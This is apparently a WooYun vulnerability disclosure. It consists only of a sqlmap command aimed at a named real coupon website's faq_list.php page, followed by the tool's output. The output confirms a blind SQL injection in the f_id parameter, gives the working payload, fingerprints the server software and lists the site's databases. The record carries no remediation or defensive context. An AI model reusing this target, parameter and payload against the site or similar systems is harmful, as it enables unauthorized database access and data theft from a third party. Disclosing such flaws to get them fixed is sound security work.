WooYun.org

[root@Hacker~]# Sqlmap sqlmap.py -u "http://www.mycoupon.com.tw/faq_list.php?f_id=10" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all app
[*] starting at 22:55:51
[22:55:51] [INFO] resuming back-end DBMS 'mysql'
[22:55:52] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: f_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: f_id=10 AND 9582=9582
---
[22:55:56] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
[22:55:56] [INFO] fetching database names
[22:55:56] [INFO] fetching number of databases
[22:55:56] [INFO] resumed: 2
[22:55:56] [INFO] resumed: information_schema
[22:55:56] [INFO] resumed: coupon_new
available databases [2]:
[*] coupon_new
[*] information_schema
[22:55:56] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occur
[22:55:56] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\???~1\???~1\SQLMAP~1.4\Bin\output\www.mycoupon.com.tw'